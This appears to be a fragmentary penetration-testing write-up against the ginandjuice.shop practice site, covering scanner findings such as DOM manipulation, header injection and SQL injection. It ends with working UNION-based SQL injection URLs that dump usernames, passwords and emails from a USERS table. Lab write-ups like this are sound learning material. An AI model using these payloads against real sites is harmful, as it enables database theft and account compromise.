Path:/catalogVulnerabilities:Client-sidetemplateinjection,Cross-sitescripting (reflected), DOM data manipulation (reflectedDOM-based), HTTP response header injection, Link manipulation (reflectedDOM-based), SQL injection
Vulnerability 1: SQLi
Testing For SQLi Vulnerability.
When I clicked on the pre-made categories listed on the website, such as All, Accessories, Accompaniments, Books, Gin, and Juice, the URL changed to include a query string. The query string has a parameter named category that accepts the selected category value.
I am well aware that this is an authentication bypass payload, but if any query works, we can use similar types of queries to exploit other vulnerabilities.
In the intruder, Add Payload and grep match value as "internal".
I will utilize any payloads that do not result in an internal error.
This is search form. So, I will try union based Payload.
This vulnerability occurs when user-supplied data is parsed or echoed by the application into a part of the DOM, allowing an attacker to manipulate the response and trigger the DOM-based vulnerability.
I will verify whether the transmitted value is correctly parsed by the browser.
Testing Value:
If this value is displayed in bold by the browser, it confirms the existence of the vulnerability.
Original URL:
I will add my test value and see if it is displayed in broswer in bold.
Value is displayed in the Browser but not in bold.
Trying Other way:
The attempted payload did not display the provided value.
There is one more input field for subscribing for updates. I will capture the request and add my payload in the email to see if it gets parsed.
The value is not displayed, and only an error message is shown.
Upon analysis, it appears that there may be a potential false positive alert during vulnerability scanning.
This vulnerability occurs when user-supplied data is copied into an HTTP response header in an unsafe manner, allowing attackers to inject headers, modify the response body, or deliver various attacks such as cross-site scripting and cache poisoning.
For Testing testing I will pass X-Forwarded-To HTTP header in request filed and see if it is shown in response or not.
I have included New Line charector after the Search Term value. "%0d and %0a" then HTTP header.
Captured the request and forwared but I didn't see the HTTP header in response.
Vulnerability 6: Link manipulation (reflected DOM-based)
Reflected DOM-based vulnerabilities occur when user-supplied data is copied from a request and dynamically echoed into the DOM without proper sanitization. This can allow attackers to manipulate the application's response, enabling exploits like redirecting users to malicious sites, intercepting sensitive data, or executing unintended actions.
This vulnerability resembles DOM data manipulation; hence, the steps for verification remain the same. After conducting a thorough check, I concluded that this method is ineffective.
SELECT `COLUMN_NAME`
FROM `INFORMATION_SCHEMA`.`COLUMNS`
WHERE `TABLE_SCHEMA`='yourdatabasename'
AND `TABLE_NAME`='yourtablename';
https://ginandjuice.shop/catalog?category=Juice' union select NULL, NULL, GROUP_CONCAT(column_name), NULL, NULL, NULL, NULL, NULL FROM information_schema.columns WHERE table_schema='PUBLIC' AND table_name='USERS'-- //
https://ginandjuice.shop/catalog?category=Juice' union select NULL, NULL, GROUP_CONCAT(username,password,email), NULL, NULL, NULL, NULL, NULL FROM information_schema.columns WHERE table_schema='PUBLIC' AND table_name='USERS'-- //
https://ginandjuice.shop/catalog?category=Juice' union select NULL, NULL, PASSWORD, NULL, NULL, EMAIL, NULL, NULL FROM USERS -- //